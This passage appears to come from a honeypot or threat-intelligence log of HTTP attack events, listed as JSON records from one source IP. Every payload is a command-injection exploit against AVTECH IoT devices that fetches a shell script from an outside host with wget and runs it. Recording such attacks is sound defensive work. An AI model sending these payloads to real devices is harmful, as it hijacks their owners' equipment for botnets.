6747.       "event_id": "22e6d1737478012583306537f805913ac8381b3be2e2afb49076a488c6c90f9c",
6748.       "source_ip_address": "35.193.32.21",
6749.       "country": "US",
6750.       "user_agent": "Snickers-Avtech",
6751.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh)&password=admin HTTP/1.1",
6752.       "post_data": "",
6753.       "target_port": 5001,
6754.       "protocol": "tcp",
6755.       "tags": [
6756.         {
6757.           "cve": "",
6758.           "category": "IoT",
6759.           "description": "AVTECH Exploit"
6760.         }
6761.       ],
6762.       "event_count": 2,
6763.       "first_seen": "2020-06-01T00:51:58Z",
6764.       "last_seen": "2020-06-01T01:11:32Z"
6765.     },
6766.     {
6767.       "event_id": "a135f73f4c104830d13639a0bbaeaffcf1a5e71e2194a7ddfd09b61e1c04fd58",
6768.       "source_ip_address": "35.193.32.21",
6769.       "country": "US",
6770.       "user_agent": "Snickers-Avtech",
6771.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh)&password=admin HTTP/1.1",
6772.       "post_data": "",
6773.       "target_port": 8443,
6774.       "protocol": "tcp",
6775.       "tags": [
6776.         {
6777.           "cve": "",
6778.           "category": "IoT",
6779.           "description": "AVTECH Exploit"
6780.         }
6781.       ],
6782.       "event_count": 2,
6783.       "first_seen": "2020-06-01T00:49:17Z",
6784.       "last_seen": "2020-06-01T01:11:31Z"
6785.     },
6786.     {
6787.       "event_id": "8febc78e331670b81dff0ef02c078b09fc7d0e90f91dd96294e24bc34f7f2d82",
6788.       "source_ip_address": "35.193.32.21",
6789.       "country": "US",
6790.       "user_agent": "Snickers-Avtech",
6791.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh)&password=admin HTTP/1.1",
6792.       "post_data": "",
6793.       "target_port": 8139,
6794.       "protocol": "tcp",
6795.       "tags": [
6796.         {
6797.           "cve": "",
6798.           "category": "IoT",
6799.           "description": "AVTECH Exploit"
6800.         }
6801.       ],
6802.       "event_count": 2,
6803.       "first_seen": "2020-06-01T00:58:36Z",
6804.       "last_seen": "2020-06-01T01:09:39Z"
6805.     },
6806.     {
6807.       "event_id": "ac261f380ace0a39e8d340a5b9d7135eec62f20b795be9e12f442a29b15c1661",
6808.       "source_ip_address": "35.193.32.21",
6809.       "country": "US",
6810.       "user_agent": "Snickers-Avtech",
6811.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh)&password=admin HTTP/1.1",
6812.       "post_data": "",
6813.       "target_port": 9090,
6814.       "protocol": "tcp",
6815.       "tags": [
6816.         {
6817.           "cve": "",
6818.           "category": "IoT",
6819.           "description": "AVTECH Exploit"
6820.         }
6821.       ],
6822.       "event_count": 1,
6823.       "first_seen": "2020-06-01T01:05:12Z",
6824.       "last_seen": "2020-06-01T01:05:12Z"
6825.     },
6826.     {
6827.       "event_id": "7836e43277c1c1adb68893f1d802ad5d38ff78abe3d6b1b9a7cedfb1331d587c",
6828.       "source_ip_address": "35.193.32.21",
6829.       "country": "US",
6830.       "user_agent": "Snickers-Avtech",
6831.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh)&password=admin HTTP/1.1",
6832.       "post_data": "",
6833.       "target_port": 8009,
6834.       "protocol": "tcp",
6835.       "tags": [
6836.         {
6837.           "cve": "",
6838.           "category": "IoT",
6839.           "description": "AVTECH Exploit"
6840.         }
6841.       ],
6842.       "event_count": 1,
6843.       "first_seen": "2020-06-01T01:03:09Z",
6844.       "last_seen": "2020-06-01T01:03:09Z"
6845.     },
6846.     {
6847.       "event_id": "fda62734e301eedb647f7fc26338ec84169a44af72f0f6f1cb902afdb74c5eaf",
6848.       "source_ip_address": "35.193.32.21",
6849.       "country": "US",
6850.       "user_agent": "Snickers-Avtech",
6851.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh)&password=admin HTTP/1.1",
6852.       "post_data": "",
6853.       "target_port": 8000,
6854.       "protocol": "tcp",
6855.       "tags": [
6856.         {
6857.           "cve": "",
6858.           "category": "IoT",
6859.           "description": "AVTECH Exploit"
6860.         }
6861.       ],
6862.       "event_count": 1,
6863.       "first_seen": "2020-06-01T01:03:06Z",
6864.       "last_seen": "2020-06-01T01:03:06Z"
6865.     },
6866.     {
6867.       "event_id": "8d4d81c04db0f24b8525133dce8a6295c4ce7ff7ac86974274d6e64bd2025ef4",
6868.       "source_ip_address": "35.193.32.21",
6869.       "country": "US",
6870.       "user_agent": "Snickers-Avtech",
6871.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh; echo snickers_was_here HTTP/1.1",
6872.       "post_data": "",
6873.       "target_port": 1400,
6874.       "protocol": "tcp",
6875.       "tags": [
6876.         {
6877.           "cve": "",
6878.           "category": "IoT",
6879.           "description": "AVTECH Exploit"
6880.         }
6881.       ],
6882.       "event_count": 1,
6883.       "first_seen": "2020-06-01T01:03:06Z",
6884.       "last_seen": "2020-06-01T01:03:06Z"
6885.     },
6886.     {
6887.       "event_id": "48bb83e94682c826f2bf8a01192f43c25abf39252036a4a7fe56701a831b8d4d",
6888.       "source_ip_address": "35.193.32.21",
6889.       "country": "US",
6890.       "user_agent": "Snickers-Avtech",
6891.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh)&password=admin HTTP/1.1",
6892.       "post_data": "",
6893.       "target_port": 9000,
6894.       "protocol": "tcp",
6895.       "tags": [
6896.         {
6897.           "cve": "",
6898.           "category": "IoT",
6899.           "description": "AVTECH Exploit"
6900.         }
6901.       ],
6902.       "event_count": 1,
6903.       "first_seen": "2020-06-01T01:03:05Z",
6904.       "last_seen": "2020-06-01T01:03:05Z"
6905.     },
6906.     {
6907.       "event_id": "a768a71f5715c4e41829cb368c2ad075bb61d472bfd2c6419a17cdc5e11a8c45",
6908.       "source_ip_address": "35.193.32.21",
6909.       "country": "US",
6910.       "user_agent": "Snickers-Avtech",
6911.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh)&password=admin HTTP/1.1",
6912.       "post_data": "",
6913.       "target_port": 1400,
6914.       "protocol": "tcp",
6915.       "tags": [
6916.         {
6917.           "cve": "",
6918.           "category": "IoT",
6919.           "description": "AVTECH Exploit"
6920.         }
6921.       ],
6922.       "event_count": 1,
6923.       "first_seen": "2020-06-01T01:03:04Z",
6924.       "last_seen": "2020-06-01T01:03:04Z"
6925.     },
6926.     {
6927.       "event_id": "24112276bacf665906f3bef978ebb9218496f5e6e6b0b2df7988c5a1139c1b38",
6928.       "source_ip_address": "35.193.32.21",
6929.       "country": "US",
6930.       "user_agent": "Snickers-Avtech",
6931.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh)&password=admin HTTP/1.1",
6932.       "post_data": "",
6933.       "target_port": 2375,
6934.       "protocol": "tcp",
6935.       "tags": [
6936.         {
6937.           "cve": "",
6938.           "category": "IoT",
6939.           "description": "AVTECH Exploit"
6940.         }
6941.       ],
6942.       "event_count": 1,
6943.       "first_seen": "2020-06-01T01:00:44Z",
6944.       "last_seen": "2020-06-01T01:00:44Z"
6945.     },
6946.     {
6947.       "event_id": "f6d9406b5069e04558c5fda93148ebdc23932063a4d7e25992621a5536f24a02",
6948.       "source_ip_address": "35.193.32.21",
6949.       "country": "US",
6950.       "user_agent": "Snickers-Avtech",
6951.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh)&password=admin HTTP/1.1",
6952.       "post_data": "",
6953.       "target_port": 8123,
6954.       "protocol": "tcp",
6955.       "tags": [
6956.         {
6957.           "cve": "",
6958.           "category": "IoT",
6959.           "description": "AVTECH Exploit"
6960.         }
6961.       ],
6962.       "event_count": 1,
6963.       "first_seen": "2020-06-01T01:00:44Z",
6964.       "last_seen": "2020-06-01T01:00:44Z"
6965.     },
6966.     {
6967.       "event_id": "be9d007cea4a2e4b8628ee962303a2ac4cc9971e201b3f2576ef386f0acef579",
6968.       "source_ip_address": "35.193.32.21",
6969.       "country": "US",
6970.       "user_agent": "Snickers-Avtech",
6971.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh; echo snickers_was_here HTTP/1.1",
6972.       "post_data": "",
6973.       "target_port": 16993,
6974.       "protocol": "tcp",
6975.       "tags": [
6976.         {
6977.           "cve": "",
6978.           "category": "IoT",
6979.           "description": "AVTECH Exploit"
6980.         }
6981.       ],
6982.       "event_count": 2,
6983.       "first_seen": "2020-06-01T00:58:44Z",
6984.       "last_seen": "2020-06-01T00:58:47Z"
6985.     },
6986.     {
6987.       "event_id": "b1c668e0efacb67401acb3607e2c8c1f10ad4ffbb47c88077e4adf0e27d62fbd",
6988.       "source_ip_address": "35.193.32.21",
6989.       "country": "US",
6990.       "user_agent": "Snickers-Avtech",
6991.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh; echo snickers_was_here HTTP/1.1",
6992.       "post_data": "",
6993.       "target_port": 8888,
6994.       "protocol": "tcp",
6995.       "tags": [
6996.         {
6997.           "cve": "",
6998.           "category": "IoT",
6999.           "description": "AVTECH Exploit"
7000.         }
7001.       ],
7002.       "event_count": 1,
7003.       "first_seen": "2020-06-01T00:58:47Z",
7004.       "last_seen": "2020-06-01T00:58:47Z"
7005.     },
7006.     {
7007.       "event_id": "7a63404053f5d77ee31adcd9a8c4865cd8687de13528e059f40ace37817dc447",
7008.       "source_ip_address": "35.193.32.21",
7009.       "country": "US",
7010.       "user_agent": "Snickers-Avtech",
7011.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh)&password=admin HTTP/1.1",
7012.       "post_data": "",
7013.       "target_port": 8888,
7014.       "protocol": "tcp",
7015.       "tags": [
7016.         {
7017.           "cve": "",
7018.           "category": "IoT",
7019.           "description": "AVTECH Exploit"
7020.         }
7021.       ],
7022.       "event_count": 1,
7023.       "first_seen": "2020-06-01T00:58:45Z",
7024.       "last_seen": "2020-06-01T00:58:45Z"
7025.     },
7026.     {
7027.       "event_id": "2ec98375dd8f590d96b2f11de2b28cbd75078dd140914a8edf091ad4a9ece2d1",
7028.       "source_ip_address": "35.193.32.21",
7029.       "country": "US",
7030.       "user_agent": "Snickers-Avtech",
7031.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh)&password=admin HTTP/1.1",
7032.       "post_data": "",
7033.       "target_port": 16993,
7034.       "protocol": "tcp",
7035.       "tags": [
7036.         {
7037.           "cve": "",
7038.           "category": "IoT",
7039.           "description": "AVTECH Exploit"
7040.         }
7041.       ],
7042.       "event_count": 2,
7043.       "first_seen": "2020-06-01T00:58:41Z",
7044.       "last_seen": "2020-06-01T00:58:45Z"
7045.     },
7046.     {
7047.       "event_id": "c5b7ce396caf187f8f34e01e822fd6ca8bf609ff4a9328190274de8e33de16c2",
7048.       "source_ip_address": "35.193.32.21",
7049.       "country": "US",
7050.       "user_agent": "Snickers-Avtech",
7051.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh; echo snickers_was_here HTTP/1.1",
7052.       "post_data": "",
7053.       "target_port": 4242,
7054.       "protocol": "tcp",
7055.       "tags": [
7056.         {
7057.           "cve": "",
7058.           "category": "IoT",
7059.           "description": "AVTECH Exploit"
7060.         }
7061.       ],
7062.       "event_count": 1,
7063.       "first_seen": "2020-06-01T00:58:39Z",
7064.       "last_seen": "2020-06-01T00:58:39Z"
7065.     },
7066.     {
7067.       "event_id": "66774669ddeecae141481b7db67461e246280bef190c0d2d772b5fb4293dbf43",
7068.       "source_ip_address": "35.193.32.21",
7069.       "country": "US",
7070.       "user_agent": "Snickers-Avtech",
7071.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh)&password=admin HTTP/1.1",
7072.       "post_data": "",
7073.       "target_port": 4242,
7074.       "protocol": "tcp",
7075.       "tags": [
7076.         {
7077.           "cve": "",
7078.           "category": "IoT",
7079.           "description": "AVTECH Exploit"
7080.         }
7081.       ],
7082.       "event_count": 1,
7083.       "first_seen": "2020-06-01T00:58:37Z",
7084.       "last_seen": "2020-06-01T00:58:37Z"
7085.     },
7086.     {
7087.       "event_id": "dc309eb961027d3c9eabb7de7f6aa551f72740f7f3fb485465958de807abd97f",
7088.       "source_ip_address": "35.193.32.21",
7089.       "country": "US",
7090.       "user_agent": "Snickers-Avtech",
7091.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh)&password=admin HTTP/1.1",
7092.       "post_data": "",
7093.       "target_port": 7474,
7094.       "protocol": "tcp",
7095.       "tags": [
7096.         {
7097.           "cve": "",
7098.           "category": "IoT",
7099.           "description": "AVTECH Exploit"
7100.         }
7101.       ],
7102.       "event_count": 1,
7103.       "first_seen": "2020-06-01T00:58:29Z",
7104.       "last_seen": "2020-06-01T00:58:29Z"
7105.     },
7106.     {
7107.       "event_id": "07dcfb2a0570eae5b5ddc076fc63dd6c64e6f2761cd7f9337dcf379cfba548a5",
7108.       "source_ip_address": "35.193.32.21",
7109.       "country": "US",
7110.       "user_agent": "Snickers-Avtech",
7111.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh)&password=admin HTTP/1.1",
7112.       "post_data": "",
7113.       "target_port": 9002,
7114.       "protocol": "tcp",
7115.       "tags": [
7116.         {
7117.           "cve": "",
7118.           "category": "IoT",
7119.           "description": "AVTECH Exploit"
7120.         }
7121.       ],
7122.       "event_count": 2,
7123.       "first_seen": "2020-06-01T00:49:46Z",
7124.       "last_seen": "2020-06-01T00:54:06Z"
7125.     },
7126.     {
7127.       "event_id": "3eaa93cb3e429ae67bae977b298dc01d96c9074b0102d46c61f74a898fc73b0d",
7128.       "source_ip_address": "35.193.32.21",
7129.       "country": "US",
7130.       "user_agent": "Snickers-Avtech",
7131.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh; echo snickers_was_here HTTP/1.1",
7132.       "post_data": "",
7133.       "target_port": 8791,
7134.       "protocol": "tcp",
7135.       "tags": [
7136.         {
7137.           "cve": "",
7138.           "category": "IoT",
7139.           "description": "AVTECH Exploit"
7140.         }
7141.       ],
7142.       "event_count": 1,
7143.       "first_seen": "2020-06-01T00:54:06Z",
7144.       "last_seen": "2020-06-01T00:54:06Z"
7145.     },
7146.     {
7147.       "event_id": "98c38527c71de30e9526fe169390d1289308c5c29ade34b83c84ac276a4399ec",
7148.       "source_ip_address": "35.193.32.21",
7149.       "country": "US",
7150.       "user_agent": "Snickers-Avtech",
7151.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh)&password=admin HTTP/1.1",
7152.       "post_data": "",
7153.       "target_port": 8791,
7154.       "protocol": "tcp",
7155.       "tags": [
7156.         {
7157.           "cve": "",
7158.           "category": "IoT",
7159.           "description": "AVTECH Exploit"
7160.         }
7161.       ],
7162.       "event_count": 1,
7163.       "first_seen": "2020-06-01T00:54:04Z",
7164.       "last_seen": "2020-06-01T00:54:04Z"
7165.     },
7166.     {
7167.       "event_id": "20e4485c3beb83ba3845d7c311c18660be47cbecfbff1e4954045828faf3ddfa",
7168.       "source_ip_address": "35.193.32.21",
7169.       "country": "US",
7170.       "user_agent": "Snickers-Avtech",
7171.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh; echo snickers_was_here HTTP/1.1",
7172.       "post_data": "",
7173.       "target_port": 5001,
7174.       "protocol": "tcp",
7175.       "tags": [
7176.         {
7177.           "cve": "",
7178.           "category": "IoT",
7179.           "description": "AVTECH Exploit"
7180.         }
7181.       ],
7182.       "event_count": 1,
7183.       "first_seen": "2020-06-01T00:52:01Z",
7184.       "last_seen": "2020-06-01T00:52:01Z"
7185.     },
7186.     {
7187.       "event_id": "6bddb37f00008001212a40b7dd200cd5728b31e592dc58c4141f99ee246b4d39",
7188.       "source_ip_address": "35.193.32.21",
7189.       "country": "US",
7190.       "user_agent": "Snickers-Avtech",
7191.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh; echo snickers_was_here HTTP/1.1",
7192.       "post_data": "",
7193.       "target_port": 8081,
7194.       "protocol": "tcp",
7195.       "tags": [
7196.         {
7197.           "cve": "",
7198.           "category": "IoT",
7199.           "description": "AVTECH Exploit"
7200.         }
7201.       ],
7202.       "event_count": 1,
7203.       "first_seen": "2020-06-01T00:51:59Z",
7204.       "last_seen": "2020-06-01T00:51:59Z"
7205.     },
7206.     {
7207.       "event_id": "ff29f9422094258240c325dfb5cb4a654e38604a8f18aafbd533faebe32c6a44",
7208.       "source_ip_address": "35.193.32.21",
7209.       "country": "US",
7210.       "user_agent": "Snickers-Avtech",
7211.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh; echo snickers_was_here HTTP/1.1",
7212.       "post_data": "",
7213.       "target_port": 4567,
7214.       "protocol": "tcp",
7215.       "tags": [
7216.         {
7217.           "cve": "",
7218.           "category": "IoT",
7219.           "description": "AVTECH Exploit"
7220.         }
7221.       ],
7222.       "event_count": 1,
7223.       "first_seen": "2020-06-01T00:51:58Z",
7224.       "last_seen": "2020-06-01T00:51:58Z"
7225.     },
7226.     {
7227.       "event_id": "f29922af158cce313f32dc30890bd68f2656f01174e25b3b1b206f3fbab2f992",
7228.       "source_ip_address": "35.193.32.21",
7229.       "country": "US",
7230.       "user_agent": "Snickers-Avtech",
7231.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh; echo snickers_was_here HTTP/1.1",
7232.       "post_data": "",
7233.       "target_port": 443,
7234.       "protocol": "tcp",
7235.       "tags": [
7236.         {
7237.           "cve": "",
7238.           "category": "IoT",
7239.           "description": "AVTECH Exploit"
7240.         }
7241.       ],
7242.       "event_count": 1,
7243.       "first_seen": "2020-06-01T00:51:58Z",
7244.       "last_seen": "2020-06-01T00:51:58Z"
7245.     },
7246.     {
7247.       "event_id": "7d8d7f23ba6b95adeef7180be4bf6590d501c5ba26ade728bd9ca9a0067e33b5",
7248.       "source_ip_address": "35.193.32.21",
7249.       "country": "US",
7250.       "user_agent": "Snickers-Avtech",
7251.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh)&password=admin HTTP/1.1",
7252.       "post_data": "",
7253.       "target_port": 8081,
7254.       "protocol": "tcp",
7255.       "tags": [
7256.         {
7257.           "cve": "",
7258.           "category": "IoT",
7259.           "description": "AVTECH Exploit"
7260.         }
7261.       ],
7262.       "event_count": 1,
7263.       "first_seen": "2020-06-01T00:51:57Z",
7264.       "last_seen": "2020-06-01T00:51:57Z"
7265.     },
7266.     {
7267.       "event_id": "ab329baa06870aff164484fae4beef73ba837e68b3cbf69c6c7216daee8305f3",
7268.       "source_ip_address": "35.193.32.21",
7269.       "country": "US",
7270.       "user_agent": "Snickers-Avtech",
7271.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh)&password=admin HTTP/1.1",
7272.       "post_data": "",
7273.       "target_port": 4567,
7274.       "protocol": "tcp",
7275.       "tags": [
7276.         {
7277.           "cve": "",
7278.           "category": "IoT",
7279.           "description": "AVTECH Exploit"
7280.         }
7281.       ],
7282.       "event_count": 1,
7283.       "first_seen": "2020-06-01T00:51:56Z",
7284.       "last_seen": "2020-06-01T00:51:56Z"
7285.     },
7286.     {
7287.       "event_id": "b4fd49cb5c643f0fc65ef87f6b63a808ed77a28c7425f2f956d4f530e33dcc34",
7288.       "source_ip_address": "35.193.32.21",
7289.       "country": "US",
7290.       "user_agent": "Snickers-Avtech",
7291.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh)&password=admin HTTP/1.1",
7292.       "post_data": "",
7293.       "target_port": 443,
7294.       "protocol": "tcp",
7295.       "tags": [
7296.         {
7297.           "cve": "",
7298.           "category": "IoT",
7299.           "description": "AVTECH Exploit"
7300.         }
7301.       ],
7302.       "event_count": 1,
7303.       "first_seen": "2020-06-01T00:51:56Z",
7304.       "last_seen": "2020-06-01T00:51:56Z"
7305.     },
7306.     {
7307.       "event_id": "89d57b9dd5585dc8a512c5abdd0151a809efcbfb313495e532a3ddc397836aeb",
7308.       "source_ip_address": "35.193.32.21",
7309.       "country": "US",
7310.       "user_agent": "Snickers-Avtech",
7311.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh; echo snickers_was_here HTTP/1.1",
7312.       "post_data": "",
7313.       "target_port": 7001,
7314.       "protocol": "tcp",
7315.       "tags": [
7316.         {
7317.           "cve": "",
7318.           "category": "IoT",
7319.           "description": "AVTECH Exploit"
7320.         }
7321.       ],
7322.       "event_count": 2,
7323.       "first_seen": "2020-06-01T00:49:46Z",
7324.       "last_seen": "2020-06-01T00:51:38Z"
7325.     },
7326.     {
7327.       "event_id": "f02977697ac0665a407d514fe2736a4f36c88b41aeebeeb08114c8c825e4b26c",
7328.       "source_ip_address": "35.193.32.21",
7329.       "country": "US",
7330.       "user_agent": "Snickers-Avtech",
7331.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh)&password=admin HTTP/1.1",
7332.       "post_data": "",
7333.       "target_port": 7001,
7334.       "protocol": "tcp",
7335.       "tags": [
7336.         {
7337.           "cve": "",
7338.           "category": "IoT",
7339.           "description": "AVTECH Exploit"
7340.         }
7341.       ],
7342.       "event_count": 2,
7343.       "first_seen": "2020-06-01T00:49:44Z",
7344.       "last_seen": "2020-06-01T00:51:36Z"
7345.     },
7346.     {
7347.       "event_id": "8ba80991122ce2b17c590a67e42557a57ee1f2a1ed19d151885f0a3eb7a566d5",
7348.       "source_ip_address": "35.193.32.21",
7349.       "country": "US",
7350.       "user_agent": "Snickers-Avtech",
7351.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh; echo snickers_was_here HTTP/1.1",
7352.       "post_data": "",
7353.       "target_port": 9002,
7354.       "protocol": "tcp",
7355.       "tags": [
7356.         {
7357.           "cve": "",
7358.           "category": "IoT",
7359.           "description": "AVTECH Exploit"
7360.         }
7361.       ],
7362.       "event_count": 1,
7363.       "first_seen": "2020-06-01T00:49:48Z",
7364.       "last_seen": "2020-06-01T00:49:48Z"
7365.     },
7366.     {
7367.       "event_id": "de56b2da23f04755844392d51218994f94b5580be94980d9bb246fc1ac2baafc",
7368.       "source_ip_address": "35.193.32.21",
7369.       "country": "US",
7370.       "user_agent": "Snickers-Avtech",
7371.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh; echo snickers_was_here HTTP/1.1",
7372.       "post_data": "",
7373.       "target_port": 9200,
7374.       "protocol": "tcp",
7375.       "tags": [
7376.         {
7377.           "cve": "",
7378.           "category": "IoT",
7379.           "description": "AVTECH Exploit"
7380.         }
7381.       ],
7382.       "event_count": 1,
7383.       "first_seen": "2020-06-01T00:49:44Z",
7384.       "last_seen": "2020-06-01T00:49:44Z"
7385.     },
7386.     {
7387.       "event_id": "083a9a2b94c06c12a73f987c481e2b6db8031695c4c8368b8b70f42f94dca302",
7388.       "source_ip_address": "35.193.32.21",
7389.       "country": "US",
7390.       "user_agent": "Snickers-Avtech",
7391.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh)&password=admin HTTP/1.1",
7392.       "post_data": "",
7393.       "target_port": 9200,
7394.       "protocol": "tcp",
7395.       "tags": [
7396.         {
7397.           "cve": "",
7398.           "category": "IoT",
7399.           "description": "AVTECH Exploit"
7400.         }
7401.       ],
7402.       "event_count": 1,
7403.       "first_seen": "2020-06-01T00:49:41Z",
7404.       "last_seen": "2020-06-01T00:49:41Z"
7405.     },
7406.     {
7407.       "event_id": "1b18a519f2614ad824ad0b2adf63aabc663f2261a0f1010438a27c2a0e01768b",
7408.       "source_ip_address": "35.193.32.21",
